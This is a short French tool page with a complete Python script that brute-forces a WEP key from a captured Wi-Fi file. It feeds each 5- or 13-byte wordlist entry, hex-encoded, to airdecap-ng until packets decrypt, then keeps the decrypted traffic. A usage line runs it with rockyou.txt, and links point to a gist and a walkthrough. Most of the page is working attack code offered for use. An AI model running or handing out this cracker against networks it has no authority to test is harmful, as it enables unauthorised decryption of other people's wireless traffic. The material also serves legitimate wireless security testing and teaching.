
Outils

Cracker un mot de passe WEP avec un nombre d'IV insuffisant.

https://gist.github.com/tbhaxor/170894df0d43fd23eae49b0b20442c27

Script

Python 3
import re
import sys
import subprocess
import os
import uuid
from binascii import hexlify
from concurrent.futures import ThreadPoolExecutor

# The script needs three positional arguments (wordlist, capture file, BSSID);
# print the usage line on stderr and stop with status 1 when any is missing.
argument_count = len(sys.argv)
if argument_count < 4:
    usage_line = "usage: %s <password file> <capture file> <bssid>" % sys.argv[0]
    print(usage_line, file=sys.stderr)
    sys.exit(1)

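def do_crack(ascii: bytes, key: bytes, pool: ThreadPoolExecutor) -> None:
    """Check one candidate WEP key against the capture with airdecap-ng.

    The capture file and BSSID are taken from ``sys.argv[2]`` and
    ``sys.argv[3]``. A candidate is accepted when airdecap-ng prints a line
    containing "decrypted WEP" whose last word is a non-zero integer. The
    decrypted capture is kept only in that case; otherwise the output file
    is removed, including when airdecap-ng itself fails.

    Args:
        ascii: Candidate key as raw bytes, exactly as read from the wordlist.
        key: Hex encoding of ``ascii``; passed to airdecap-ng through ``-w``.
        pool: Executor this task runs on; shut down once a key is accepted.

    Raises:
        SystemExit: After a key is accepted. Inside a ThreadPoolExecutor
            worker this is captured on the task's Future and does not stop
            the interpreter; the run ends because the pool is shut down.
        OSError, subprocess.CalledProcessError: If airdecap-ng cannot be
            started or exits non-zero. These also end up on the Future, so
            a caller that discards the Future will not see them.
    """
    # Wordlist bytes are not guaranteed to be valid UTF-8. Decode for display
    # only, and losslessly, so an undecodable byte cannot abort the task
    # before the candidate has been checked.
    shown = ascii.decode(errors="backslashreplace")
    sys.stdout.write("\033[K")
    print("[!] Trying key", shown, end="\r")

    # Random name for the decrypted capture. uuid1() would derive the name
    # from this host's node id (usually the MAC address) and a timestamp.
    outfile = uuid.uuid4().hex + ".cap"

    hit = False
    try:
        # Argument list, no shell: key, BSSID, output file, capture file.
        output = subprocess.check_output(["/usr/bin/airdecap-ng",
                                          "-w", key,
                                          "-b", sys.argv[3],
                                          "-o", outfile,
                                          sys.argv[2]],
                                         stderr=subprocess.DEVNULL)

        for entry in output.decode(errors="replace").strip().split("\n"):
            if "decrypted WEP" not in entry:
                continue
            # The last word of the line is the count of decrypted packets.
            # split() without arguments tolerates trailing whitespace or "\r".
            words = entry.split()
            try:
                hit = int(words[-1]) != 0
            except ValueError:
                hit = False
            if hit:
                break
    finally:
        # Remove the output once, on every path that did not accept the key,
        # so failed attempts and subprocess errors leave no files behind.
        if not hit:
            try:
                os.unlink(outfile)
            except FileNotFoundError:
                pass

    if not hit:
        return

    # The kept file holds the decrypted traffic, in the working directory.
    sys.stdout.write("\033[K")
    print("\r[!] Found: ", shown)
    print("[!] Decrypted file: ", outfile)

    # Cancelling queued work and refusing new submissions is what actually
    # stops the run; sys.exit() below only ends this worker's task.
    pool.shutdown(wait=False, cancel_futures=True)
    sys.exit(0)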


# Entry point: stream the wordlist and queue one do_crack task per usable line.
# pool.submit() raises RuntimeError once the executor has been shut down
# (do_crack does this after accepting a key); that is treated as the normal
# stop signal and exits with status 0. Any other exception is reported and
# ends the run with status 1.
try:
    # Five worker threads; the wordlist is opened in binary mode (first argument).
    with ThreadPoolExecutor(max_workers=5) as pool, open(sys.argv[1], "rb") as file:
        for raw_line in file:
            # Drop surrounding whitespace, including the trailing \r and/or \n.
            candidate = raw_line.strip()

            # Only 5-byte (40-bit) and 13-byte (104-bit) entries are submitted;
            # every other length is skipped.
            if len(candidate) not in (5, 13):
                continue

            # The key is passed on hex-encoded, like "echo key | xxd -ps".
            pool.submit(do_crack, candidate, hexlify(candidate), pool)
except RuntimeError:
    sys.exit(0)
except Exception as e:
    print("Unexpected failure: %s" % e)
    sys.exit(1)

Exemple d'usage

python wep_decrypt.py <wordlist> <pcap_file> <bssid>

En pratique :

python3 wep_decrypt.py /usr/share/wordlists/rockyou.txt file.cap ff:ff:ff:ff:ff:ff

Note

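Attention à bien choisir sa liste de mots de passe : le script ne teste que les entrées de 5 ou 13 octets (clés WEP de 40 ou 104 bits) et ignore toutes les autres.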

Présentation et explication d'une attaque

https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/